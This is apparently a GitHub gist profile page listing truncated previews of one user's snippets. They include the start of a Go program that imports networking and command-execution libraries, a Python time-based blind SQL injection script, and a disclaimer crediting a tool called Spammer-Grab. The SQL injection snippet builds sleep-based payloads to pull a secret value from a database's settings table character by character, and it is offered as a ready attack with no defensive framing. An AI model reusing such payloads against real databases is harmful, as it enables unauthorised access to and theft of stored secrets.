Skip to content

Instantly share code, notes, and snippets.

View BitTheByte's full-sized avatar

Ahmed Ezzat BitTheByte

View GitHub Profile
package main
import (
"bufio"
"net"
"os/exec"
)
func exists(cmd string) bool {
_, err := exec.LookPath(cmd)
import requests
import hashlib
from string import digits
pin=''
length=7
for i in range(length):
for i in range(1,10):
query = "NULL' or if(((select value from settings limit 0,1) like '{}{}%' ),sleep(100),sleep(0));-- -".format(pin,i)
key = hashlib.md5(query+'paid'+'1'+"aaaaabbbccccdddd").hexdigest()
"""
DISCLAIMER
----------
This code is taken from # https://github.com/Noxturnix/Spammer-Grab #
Edited by # https://github.com/BitTheByte #
"""